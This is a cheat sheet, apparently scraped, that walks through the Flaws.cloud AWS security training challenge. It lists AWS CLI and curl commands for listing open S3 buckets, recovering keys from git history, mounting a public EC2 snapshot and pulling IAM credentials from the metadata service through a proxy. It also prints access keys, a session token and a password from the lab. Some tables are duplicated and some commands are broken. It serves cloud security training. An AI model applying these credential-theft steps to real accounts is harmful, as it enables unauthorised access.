- Flaws.Cloud 1 - Walkthrough Cheat Sheet
- Levels
- Level 0 - Level 0 Name
- Important Notes from Level 0
- Level 1 - AWS Un-Authenticated Enumeration
- Important Notes from Level 1
- Level 2 - AWS Authenticated Enumeration
- Important Notes from Level 2
- Level 3 - Access Key in Git Log Commits
- Level 4 - Sensitive Data in EC2 Snapshots
- Level 5 - Level 5 EC2 Metadata 169.254.169.254
- Final Level 6 - Final Level 6 Name
- AWS Un-Authenticated Enumeration
- AWS CLI installed
- AWS CLI Profile configured
- AWS Authenticated Enumeration
- AWS CLI installed
- AWS CLI Profile configured
- Create AWS S3Admin Group
- Attach AWS AmazonS3FullAccess Policy To S3Admin Group
- Access Key in Git Log Commits
- AWS CLI installed
- AWS CLI Profile configured
- Create AWS S3Admin Group
- Attach AWS AmazonS3FullAccess Policy To S3Admin Group
- Installed Git CLI
- Sensitive Data in EC2 Snapshots
- AmazonEC2FullAccess Policy Attached to L4Profile
- AdministratorAccess Policy Attached to L4Profile
- EC2 Metadata 169.254.169.254
- Full Update
sudo apt-get update -y && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y && sudo apt-get autoremove -y && sudo apt-get autoclean -y
- JQ
- Full Update
- Level 6
- Full Update
sudo apt-get update -y && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y && sudo apt-get autoremove -y && sudo apt-get autoclean -y
- JQ
- AWS CLI installed
- AWS CLI Profile configured
- AdministratorAccess Policy Attached to L4Profile
- Full Update
- AWS Enumeration Un-Authenticated
- AWS Enumeration Authenticated
- Access Key in Git Log Commits
- Sensitive Data in EC2 Snapshots
aws s3 ls
curl
- aws sts get-caller-identity
- aws ec2 describe-snapshots
- aws ec2 create-key-pair
- aws ec2 run-instances
- aws ec2 describe-instances
- aws ec2 create-volume
- aws ec2 attach-volume
- SSH
- [lsblk]("List Dissks Command")
- [mount]("Mount Disks Command")
- EC2 Metadata 169.254.169.254
- Level 6
1. π Command | Description |
---|---|
1.0. π AWS Un-Authenticated Enumeration | Un-Authenticated Access to AWS S3 Buckets |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
1.1. π ./Flaws-Scripts/aws_cli_install.sh |
Install AWS CLI |
1.2. π ./Flaws-Scripts/aws_cli_configure.sh |
Configure |
1.3. π CHALLENGE_URL="flaws.cloud" && nslookup $CHALLENGE_URL |
Execute NS Lookup Against Challenge URL |
1.4. π nslookup $L1_BUCKET_IP |
Execute NS Lookup Against Discovered IP |
1.5. :pager aws s3 ls $L1_BUCKET_URL --no-sign-request --region $AWS_REGION |
Access & List S3 Bucket Files using AWS CLI - Un-Authenticated |
1.6/1.1. π aws s3 sync $L1_BUCKET_URL --no-sign-request --region $AWS_REGION ./flaws1 |
Copy Bucket Files |
1.6/1.2. π `export L2_URL=$(cat flaws1/$L1_SECRET_FILE | grep -oP '<a href="\K[^"]+')` |
1.6/2.1. π `export L2_URL=$(curl -s $L1_SECRET_URL | grep -oP '<a href="\K[^"]+')` |
1.7. π Flaws-Scripts/aws_cli_configure_awsS3Admin.sh |
Configure AWS CLI |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
2. π Command | Description |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
2.0. π AWS Authenticated Enumeration | All Authenticated Access to AWS S3 Buckets |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
2.1. π ./Flaws-Scripts/aws_cli_configure.sh |
Configure AWS CLI |
2.2. π ./Flaws-Scripts/aws_cli_configure_awsS3Admin.sh |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
2.2. π aws s3 ls --profile $AWS_USER_NAME $L2_BUCKET_URL |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
2.3/1.1. π aws s3 sync --profile $AWS_USER_NAME $L2_BUCKET_URL --region $AWS_REGION ./flaws2 |
Copy Bucket Files |
2.3/2.1. π aws s3 cp --profile $AWS_USER_NAME $L2_SECRET_URL . |
Copy Secret From Bucket |
2.4. π `export L2_SECRET_URL=$( cat flaws2/$L2_SECRET_FILE | grep -oP '<a href="\K[^"]+')` |
2.5. π Flaws-Scripts/aws_cli_configure_awsS3Admin.sh |
Configure AWS CLI |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
3. π Command | Description |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
3.0. π Access Key in Git Log Commits | Older Git Commits Contains access_keys.txt |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
3.1. π Flaws-Scripts/aws_cli_configure.sh |
Configure AWS CLI |
3.2. π aws s3 ls --profile $AWS_USER_NAME $L3_BUCKET_URL |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
3.2. π aws s3 ls $L3_BUCKET_URL --no-sign-request --region $AWS_REGION |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
3.3. π aws s3 sync --profile $AWS_USER_NAME $L3_BUCKET_URL --region $AWS_REGION ./flaws3 |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
3.4. π cd flaws3 && git log |
View Latest Git Commit Log |
3.5. π git checkout $L3_COMMIT |
View Latest Git Commit Log |
3.6. π export L3_ACCESS_KEY=$(grep -oP '^access_key\s+\K[A-Za-z0-9]+' $L3_SECRET_FILE) |
Get AWS Level Access Key |
3.7. π export L3_SECRET_KEY=$(grep -oP '^secret_access_key\s+\K[A-Za-z0-9+/]+' $L3_SECRET_FILE) |
Get AWS Secret Access Key |
3.8. π Scrtips/aws_cli_configure_L3Profile.sh |
Set L3 Found Profile URL |
3.9. π aws --profile $L3_USER s3 ls |
List all S3 Buckets |
3.10. π `aws s3 ls --profile $L3_USER_NAME | grep -oP 'level4-\S+.flaws.cloud'` |
3.11. π Flaws-Scripts/aws_cli_configure_L3Profile.sh |
Configure AWS CLI |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
4. π Command | Description |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
4.0. π Sensitive Data in EC2 Snapshots | Sensitive Nginx Credentials in EC2 Snapshot |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
4.1. π Flaws-Scripts/aws_cli_configure_L3Profile.sh |
Configure AWS CLI |
4.2. π export L4_ACCOUNT_ID=$(aws --profile "$L3_USER_NAME" sts get-caller-identity --query 'Account' --output text) |
Identify Account Id |
4.3. π export L4_SNAPSHOT_ID=$(aws --profile $L3_USER_NAME ec2 describe-snapshots --owner-id $L4_ACCOUNT_ID --query 'Snapshots[*].{ID:SnapshotId}' --output text) |
Get Snapsot ID |
4.4. π export L4_VOLUME_ID=$(aws --profile $L4_USER ec2 create-volume --availability-zone $L4_AWS_AZ --region $AWS_REGION --snapshot-id $L4_SNAPSHOT_ID --query 'VolumeId' --output text) |
Mount Snapshot ID to Volume |
4.5. π aws --profile "$L4_USER" --region "$AWS_REGION" ec2 create-key-pair --key-name "$L4_KEY" --query 'KeyMaterial' --output text > "${}.pem" |
Create Key Pair |
4.6. π export L4_NEW_VM_ID=$(aws ec2 run-instances --profile "$L4_USER" --region "$AWS_REGION" --image-id "$L4_IMAGE" --instance-type "$L4_INSTANCE_TYPE" --key-name "$L4_KEY" --tag-specifications "ResourceType=instance,Tags=[{Key=Name,Value=${L4_VM_NAME}}]" --query 'Instances[0].InstanceId' --output text) |
Launch EC2 Instance & Get Instance Id |
4.7. π echo $L4_NEW_VM_ID |
Print New VM ID |
4.8. π export L4_NEW_VM_IP =$(aws ec2 describe-instances --profile $L4_USER --filters "Name=tag:Name,Values=Flaws_L4_VM" "Name=instance-state-name,Values=running" --query 'Reservations[].Instances[?State.Code==`16`].PublicIpAddress' --output text) |
Get New EC2 Instance IP |
4.9. π aws ec2 attach-volume --profile $L4_USER --region $AWS_REGION --instance-id $L4_NEW_VM_ID --volume-id $L4_VOLUME_ID --device /dev/xvdf |
Attach Mounted Volume to VM |
4.10. π ssh -v -i ./"$L4_KEY.pem" $L4_VM_USER@$L4_VM_HOST |
ssh into VM |
4.11. π lsblk |
list Drives |
4.12. π sudo file -s /dev/xvdf1 |
View Drive Information |
4.13. π sudo mount /dev/xvdf1 /mnt && cat /mnt/home/ubuntu/setupNginx.sh |
Mount Attached Drive & Print setupNginx File Attached Drive |
4.14. π ```export L5_URL=$(curl -u $L4_NGINX_USER:$L4_NGINX_PASSWORD -s $L4_SNAPSHOT_URL | grep -oP '<a href="\K[^"]+')``` |
4.15. π Flaws-Scripts/aws_cli_configure_L4Profile.sh |
Configure AWS CLI |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
5.0. π Command | Description |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
5.0. π EC2 Metadata 169.254.169.254 | Exposed IAM Credentials in Metadata |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
5.1. π Flaws-Scripts/aws_cli_configure_L4Profile.sh |
Configure AWS CLI |
5.2. π export L5_EC2_URL=4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud" |
Set EC2 URL Variable |
5.3. π export L5_EC2_PROXY=http://$L5_EC2_URL/proxy |
Set Proxy URL |
5.4. π export L5_EC2_METADATA_IP=$L5_EC2_PROXY/$EC2_METADATA_IP |
Get EC2 Metada Service |
5.5 π export L5_EC2_METADATA_URL=$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_METADATA_URL |
Get Metada URL |
5.6 π export L5_EC2_IAM_METADATA_URL=$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_METADATA_URL/$EC2_IAM_METADATA_URL |
Get IAM Metada URL |
5.7 π export L5_METADATA=$(curl -s "$L5_EC2_METADATA_URL") |
Get IAM Role Name |
5.8 π export L5_USER=$(curl -s "$L5_EC2_IAM_METADATA_URL") |
Get IAM Role Name |
5.9 π export L5_USER_METADATA=$(curl -s "$L5_EC2_IAM_METADATA_URL/$L5_USER") |
Get IAM Metadata Credentials |
5.10. π `export L5_ACCESS_KEY=$(curl -s "$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_IAM_METADATA_URL/$L5_USER" | jq -r '.AccessKeyId)'` |
5.11. π `export L5_SECRET_KEY=$(curl -s "$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_IAM_METADATA_URL/$L5_USER" | jq -r '.SecretAccessKey')` |
5.12. π `export L5_TOKEN=$(curl -s "$L5_EC2_PROXY/$EC2_METADATA_IP/$EC2_IAM_METADATA_URL/$L5_USER" | jq -r '.Token')` |
5.13. π Flaws-Scripts/aws_cli_configure_L5Profile.sh |
Configure AWS CLI |
5.14. π aws s3 ls --profile $L5_USER --region $AWS_REGION $L6_BUCKET_URL |
List Bucket Files |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
6. π Command | Description |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
6.0. π Command | Description |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
6.1. π ./Flaws-Scripts/aws_cli_configure_L6Profile.sh |
Configure AWS CLI |
6.2. π aws iam get-user --profile $L6_USER --region $AWS_REGION |
Get IAM User Info |
6.3. π `export L6_IAM_USER_POLICIES=$(aws iam list-attached-user-policies --user-name "$L6_IAM_USER" --profile "$L6_USER" --region "$AWS_REGION" --query 'AttachedPolicies[].PolicyArn' --output text | tr '\t' '\n' |
6.4. π Flaws-Scripts/aws_iam_full_policies |
Get IAM User Attached Policies Full Output |
6.5. π export L6_ACCOUNT_ID=$(aws --region $AWS_REGION --profile $L6_USER sts get-caller-identity --query 'Account' --output text) |
Get Level 6 Account ID |
6.6. π `export L6_EC2_LAMBDA_FUNCTION=$(aws --region $AWS_REGION --profile $L6_USER lambda list-functions --query 'Functions[].FunctionName' --output text | tr '[:upper:]' '[:lower:]')` |
6.7. π `export L6_EC2_LAMBDA_POLICY=$(aws --region $AWS_REGION --profile $L6_USER lambda list-functions --query 'Functions[].FunctionName' --output text | tr '\t' '\n' |
6.8. π `export L6_EC2_LAMBDA_ARN_STR=$(aws --region $AWS_REGION --profile $L6_USER lambda list-functions --query 'Functions[].FunctionName' --output text | tr '\t' '\n' |
6.9. π `export L6_EC2_LAMBDA_API=$(echo "$L6_EC2_LAMBDA_ARN_STR" | cut -d ':' -f 6 |
6.10. π export L6_EC2_LAMBDA_STAGE=$(aws --region $AWS_REGION --profile $L6_USER apigateway get-stages --rest-api-id $L6_EC2_LAMBDA_API --query 'item[0].stageName' --output text) |
Get EC2 Lambda Function Stage |
6.11. π `export L6_EC2_LAMBDA_SERVICE=$(aws --region $AWS_REGION --profile $L6_USER lambda list-functions --query 'Functions[].FunctionName' --output text | tr '\t' '\n' |
6.12. π `export L6_EC2_LAMBDA_FUNC_DOMAIN=$(echo "$L6_EC2_LAMBDA_ARN_STR" | grep -oP 'arn:aws:\K\w+-\w+')` |
6.13. π export L6_LAMBDA_FINAL_URL="https://$L6_EC2_LAMBDA_API.$L6_EC2_LAMBDA_FUNC_DOMAIN.$AWS_REGION.amazonaws.com/$L6_EC2_LAMBDA_STAGE/$L6_EC2_LAMBDA_FUNCTION" |
Get EC2 Lambda Function Final URL |
6.14. π `export L6_FINAL_URL=$(curl -s -X GET "$L6_LAMBDA_FINAL_URL" | grep -oP 'http[s]?://\S+')` |
6.14. π `export L6_FINAL_URL=$(curl -s -X GET "$L6_LAMBDA_FINAL_URL" | grep -oP 'http[s]?://\S+')` |
1. π Pin | Content |
---|---|
1.0. π AWS Un-Authenticated Enumeration | Un-Authenticated Access to AWS S3 Buckets |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
1.1.:pushpin: Challenge URL | flaws.cloud |
1.2.:pushpin: Bucket IP Example | 52.92.145.3 |
1.3. π Level 1 Bucket URL | s3://flaws.cloud.s3-website-us-west-2.amazonaws.com |
1.4. π awsS3Admin | awsS3Admin |
1.5. π AWS Access Key ID | AKIATQBOZIW65PUG4VN7 |
1.6. π AWS Secret Key ID | 5nNcyDO6TpZKN3WEI9XraGH+bsE7WOPzmM1XALDl |
2.1. π Level 2 URL | http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ |
1.7. π Level 1 Secret File | secret-dd02c7c.html |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
2. π Pin | Content |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
2.0. π AWS Authenticated Enumeration | All Authenticated Access to AWS S3 Buckets |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
2.1. π Level 2 URL | http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ |
2.1. π Level 2 Bucket URL | s3://http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ |
2.2. π S3Admins Group | S3Admins |
3.1. π Level 3 URL | Level 3 URL |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
3. π Pin | Content |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
3.0. π Access Key in Git Log Commits | Older Git Commits Contains access_keys.txt |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
3.1. π Level 3 URL | Level 3 URL |
3.2. π Level 3 Bucket URL | Level 3 URL |
3.3. π Level 3 Sensitive Git Commit | f52ec03b227ea6094b04e43f475fb0126edb5a61 |
3.4. π Level 3 User | L3Profile |
3.5. π Level 3 Access Keys File | access_keys.txt |
3.6. π Level 3 Access Key ID | AKIAJ366LIPB4IJKT7SA |
3.7. π Level 3 Secret Access Key ID | OdNa7m+bqUvF3Bn/qgSnPE1kBpqcBTTjqwP83Jys |
4.1. π Level 4 URL | Level 4 |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
4. π Pin | Content |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
4.0. π Sensitive Data in EC2 Snapshots | Sensitive Nginx Credentials in EC2 Snapshot |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
4.1. π Level 4 URL | http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud |
4.2. π Level 4 EC2 Snapshot | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud |
4.3. π Level 4 Account ID | 975426262029 |
4.4. π Level 4 EC2 Snapshot ID | snap-0b49342abd1bdcb89 |
4.4. π Level 4 EC2 Volume ID | vol-0e68287fb059d731b |
4.5. π Level 4 EC2 Image ID | ami-0fcf52bcf5db7b003 |
4.6. π Level 4 EC2 Instance IP | 54.69.166.141 |
4.7. π Level 4 EC2 Instace ID | i-049e3a08a0f58536b |
4.8. π Level 4 Nginx Credentials | setupNginx.sh |
4.9. π Level 4 Nginx Username | flaws |
4.10. π Level 4 Nginx Password | nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M |
5.1. π Level 5 URL | http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/ |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
5. π Pin | Content |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
5.0. π EC2 Metadata 169.254.169.254 | Exposed IAM Credentials in Metadata |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
5.1. π Level 5 URL | http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/ |
5.2. π EC2 Metadata Service IP | 169.254.169.254/ |
5.3. π EC2 Instance | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud |
5.4. π EC2 Metada URL | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/ |
5.5. π EC2 IAM Credentials Metada URL | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud |
5.6.1 π EC2 Instance Proxy 1 | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/flaws.cloud/latest/meta-data/iam/security-credentials/ |
5.6.2 π EC2 Instance Proxy 2 | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/summitroute.com/blog/feed.xml |
5.6.3 π EC2 Instance Proxy 3 | http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/neverssl.com/ |
5.7.1. π EC2 IAM USER | flaws |
5.7.2. π fLaws Access Key | ASIA6GG7PSQGZVHCOSFP |
5.7.3. π flaws Secret Key | wzAV+fRr2b0/1IdWA5fsFE1HZ9vGMaJCQ2nAuRI+ |
5.7.4. π flaws Session Token | IQoJb3JpZ2luX2VjENT//////////wEaCXVzLXdlc3QtMiJHMEUCICysxf8e25Ao5/bX7HA0OElp5/RnrV8zMCrJwuCup0+VAiEAmc1uLD5e9NbT1px9rBJZEZnWVETMbu6Cn3ZinbkJ6qcquwUIvf//////////ARADGgw5NzU0MjYyNjIwMjkiDGIiCNBVyz80c8UvFCqPBToN3XQ1BlpYWcvCHVp9s9FlhdQZSCz2TGpnbH6i9lDNH+CH0iI3+eq6/GCrQFMN2YtFv4c4joUbFbmvbxv3p4UuG1FeO3bunakS3DzqSBEF2vMNWNKiwRvOOMHstHXBkPDuK2ciHAVzAQ3JaUZEskTq7TXe4gb/i+Epkx0T3NFnX805JflQKqA6YIdHHcR71PdKKvmFxAOhFLZhdvyKYrlf76xxGjirHjXJmNiA8p/PU8ZzsOYTV0Y6kxMVHJGqwVvH4Cng+iBtL+WfponpZRMgHcBvLw0a2mMrX20BjmI7ifJAfZ9bjX90FnFvqccnnEhYjycEbty+mRtLFmDPo0KM2mbgcQWxp+s1uwzAZTI8Ft4xY6UpHDmAF/6kAU1TNUJuuOz1NtAyxwPly6+k5GaayFumsRW4VbUucLTfeQGOBUlwJAtcT2DUg5kMT9QxNz+RAFpch0f0UCGie2LOlYtg5CIbnN1IxgYjNDcp9MPqYGvVB/g5VnIxZQNHjYE65Q4ScYxwV7UIgqHcG9ZHdjRxEc/jivLvrbcqidUpoxwv55YWTpkvENLgxpQPgX98n1Kmv1ycXYVkfbTvfnPqoWz9QKIITbF+inM+oVE2IT/7jQXnnU3USLHV1DUjOxMeYZ+1BzgwQB6nZYUtvMnESVa5R0iI7r+gPOIeNcVFL3HgeD6ZuN0ZGHzDO7TvuNo4R9D+5pUQ8F4jjkZA5ynmCGkwplOlPY0EeYjl4wnAOBhjvrX20MbbPwZ6yXevi5RlkpFWr5Yennp0cXCNxUsf7Nu5EAaYFgD+PpaGRrHBkgGg9GfGQlrUE13bKVLmJsAQOuokwf9aMGc6yj9YlB5SVsjratoon+e9It1/jwb33jMwqrraoQY6sQGUxpVr3JxA1UBSG3lCGGI5seaaSLOlnTT4G03cpBaCd2RxxISOlv3LtXs5bsLCzR2+eHUeulhCn9mH/Q/SDm5ysm7ztt4DJVzqZy+2CZ+yH9aXzOHOmHhQisOboLdj9V3NMQ/9P8ZKeWpVyQSTcEaK3kJ9mkbP7NJSWOnnW1S7r0kSyq2p8v0My/6ge4gtxeZTkzws4nRcS3XIlzoqlDxHGnwDzz/op65TdyGre0bPiQ8= |
6.1 π Level 6 URL | L6_URL=http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/ |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
6. π Pin | Content |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
6.0. π Pin | Content |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
6.1. π Level 6 Account Id | 975426262029 |
6.2. π IAM Policies | MySecurityAudit:v1, list_apigateaways:v4 |
6.3. π Lambda Function | level5 |
6.4. π Lambda Policy | Allow lambda:InvokeFunction using apigateway.amazonaws.com |
6.5. π Lambda Arn | arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6 |
6.6. π Lambda Final URL | https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6 |
6.7. π Final Level 6 URL | http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/" |
- Prerequisite 1
- Prequisite Reference
0. π Command | Description |
---|---|
0.0. :pager Title | Description |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
0.1. π Flaws-Scripts/aws_cli_configure_L.sh |
Configure AWS CLI |
π Pin | Content |
---|---|
0.1. π Level 0 URL | `` |
- AWS CLI installed
- AWS CLI Profile configured
|-------------------------------------------------------------------------------------------|:---------------------------------------------------------------------- |
1. π Command | Description |
---|---|
1.0. π AWS Un-Authenticated Enumeration | Un-Authenticated Access to AWS S3 Buckets |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
1.1. π ./Flaws-Scripts/aws_cli_install.sh |
Install AWS CLI |
1.2. π ./Flaws-Scripts/aws_cli_configure.sh |
Configure |
1.3. π CHALLENGE_URL="flaws.cloud" && nslookup $CHALLENGE_URL |
Execute NS Lookup Against Challenge URL |
1.4. π nslookup $L1_BUCKET_IP |
Execute NS Lookup Against Discovered IP |
1.5. :pager aws s3 ls $L1_BUCKET_URL --no-sign-request --region $AWS_REGION |
Access & List S3 Bucket Files using AWS CLI - Un-Authenticated |
1.6/1.1. π aws s3 sync $L1_BUCKET_URL --no-sign-request --region $AWS_REGION ./flaws1 |
Copy Bucket Files |
1.6/1.2. π `export L2_URL=$(cat flaws1/$L1_SECRET_FILE | grep -oP '<a href="\K[^"]+')` |
1.6/2.1. π `export L2_URL=$(curl -s $L1_SECRET_URL | grep -oP '<a href="\K[^"]+')` |
1.7. π Flaws-Scripts/aws_cli_configure_awsS3Admin.sh |
Configure AWS CLI |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
1. π Pin | Content |
---|---|
1.0. π AWS Un-Authenticated Enumeration | Un-Authenticated Access to AWS S3 Buckets |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
1.1.:pushpin: Challenge URL | flaws.cloud |
1.2.:pushpin: Bucket IP Example | 52.92.145.3 |
1.3. π Bucket URL | http://flaws.cloud.s3-website-us-west-2.amazonaws.com |
1.4. π awsS3Admin | awsS3Admin |
1.5. π AWS Access Key ID | AKIATQBOZIW65PUG4VN7 |
1.6. π AWS Secret Key ID | 5nNcyDO6TpZKN3WEI9XraGH+bsE7WOPzmM1XALDl |
1.7. π Level 1 Secret File | secret-dd02c7c.html |
2.1. π Level 2 URL | http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ |
1.3. π Level 1 Bucket URL | s3://flaws.cloud/ |
- AWS CLI installed
- AWS CLI Profile configured
- Create AWS S3Admin Group
- Attach AWS AmazonS3FullAccess Policy To S3Admin Group
|-------------------------------------------------------------------------------------------|:---------------------------------------------------------------------- |
2. π Command | Description |
---|---|
2.0. π AWS Authenticated Enumeration | All Authenticated Access to AWS S3 Buckets |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
2.1. π ./Flaws-Scripts/aws_cli_configure.sh |
Configure AWS CLI |
2.2. π ./Flaws-Scripts/aws_cli_configure_awsS3Admin.sh |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
2.2. π aws s3 ls --profile $AWS_USER_NAME $L2_BUCKET_URL |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
2.3/1.1. π aws s3 sync --profile $AWS_USER_NAME $L2_BUCKET_URL --region $AWS_REGION ./flaws2 |
Copy Bucket Files |
2.3/2.1. π aws s3 cp --profile $AWS_USER_NAME $L2_SECRET_URL . |
Copy Secret From Bucket |
2.4. π `export L2_SECRET_URL=$( cat flaws2/$L2_SECRET_FILE | grep -oP '<a href="\K[^"]+')` |
2.5. π Flaws-Scripts/aws_cli_configure_awsS3Admin.sh |
Configure AWS CLI |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
|-------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------|
2. π Pin | Content |
---|---|
2.0. π AWS Authenticated Enumeration | All Authenticated Access to AWS S3 Buckets |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
2.1. π Level 2 URL | http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ |
2.2. π S3Admins Group | S3Admins |
3.1. π Level 3 URL | Level 3 URL |
- AWS CLI installed
- AWS CLI Profile configured
- Create AWS S3Admin Group
- Attach AWS AmazonS3FullAccess Policy To S3Admin Group
- Installed Git CLI
|-------------------------------------------------------------------------------------------|:---------------------------------------------------------------------- |
3. π Command | Description |
---|---|
3.0. π Access Key in Git Log Commits | Older Git Commits Contains access_keys.txt |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
3.1. π Flaws-Scripts/aws_cli_configure.sh |
Configure AWS CLI |
3.2. π aws s3 ls --profile $AWS_USER_NAME $L3_BUCKET_URL |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
3.2. π aws s3 ls $L3_BUCKET_URL --no-sign-request --region $AWS_REGION |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
3.3. π aws s3 sync --profile $AWS_USER_NAME $L3_BUCKET_URL --region $AWS_REGION ./flaws3 |
Access & List S3 Bucket Files using AWS CLI - Authenticated |
3.4. π cd flaws3 && git log |
View Latest Git Commit Log |
3.5. π git checkout $L3_COMMIT |
View Latest Git Commit Log |
3.6. π export L3_ACCESS_KEY=$(grep -oP '^access_key\s+\K[A-Za-z0-9]+' $L3_SECRET_FILE) |
Get AWS Level Access Key |
3.7. π export L3_SECRET_KEY=$(grep -oP '^secret_access_key\s+\K[A-Za-z0-9+/]+' $L3_SECRET_FILE) |
Get AWS Secret Access Key |
3.8. π Scrtips/aws_cli_configure_L3Profile.sh |
Set L3 Found Profile URL |
3.9. π aws --profile $L3_USER s3 ls |
List all S3 Buckets |
3.10. π `aws s3 ls --profile $L3_USER_NAME | grep -oP 'level4-\S+.flaws.cloud'` |
3.11. π Flaws-Scripts/aws_cli_configure_L3Profile.sh |
Configure AWS CLI |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
|-------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------|
3. π Pin | Content |
---|---|
3.0. π Access Key in Git Log Commits | Older Git Commits Contains access_keys.txt |
------------------------------- | :---------------------------------------------------------------------------------------------------------------------------------------- |
3.1. π Level 3 URL | Level 3 URL |
3.2. π Level 3 Bucket URL | Level 3 URL |
3.3. π Level 3 Sensitive Git Commit | f52ec03b227ea6094b04e43f475fb0126edb5a61 |
3.4. π Level 3 User | L3Profile |
3.5. π Level 3 Access Keys File | access_keys.txt |
3.6. π Level 3 Access Key ID | AKIAJ366LIPB4IJKT7SA |
3.7. π Level 3 Secret Access Key ID | OdNa7m+bqUvF3Bn/qgSnPE1kBpqcBTTjqwP83Jys |
4.1. π Level 4 URL | Level 4 |
- AmazonEC2FullAccess Policy Attached to L4Profile
- AdministratorAccess Policy Attached to L4Profile
aws s3 ls
curl
- aws sts get-caller-identity
- aws ec2 describe-snapshots
- aws ec2 create-key-pair
- aws ec2 run-instances
- aws ec2 describe-instances
- aws ec2 create-volume
- aws ec2 attach-volume
- SSH
- [lsblk]("List Dissks Command")
- [mount]("Mount Disks Command")
|-------------------------------------------------------------------------------------------|:----------------------------------------------------------------------|
4. π Command | Description |
---|---|
4.0. π Sensitive Data in EC2 Snapshots | Sensitive Nginx Credentials in EC2 Snapshot |
------------------------------------------------------------------------------------------- | :---------------------------------------------------------------------- |
4.1. π Flaws-Scripts/aws_cli_configure_L3Profile.sh |
Configure AWS CLI |
4.2. π export L4_ACCOUNT_ID=$(aws --profile "$L3_USER_NAME" sts get-caller-identity --query 'Account' --output text) |
Identify Account Id |
4.3. π export L4_SNAPSHOT_ID=$(aws --profile $L3_USER_NAME ec2 describe-snapshots --owner-id $L4_ACCOUNT_ID --query 'Snapshots[*].{ID:SnapshotId}' --output text) |
Get Snapsot ID |
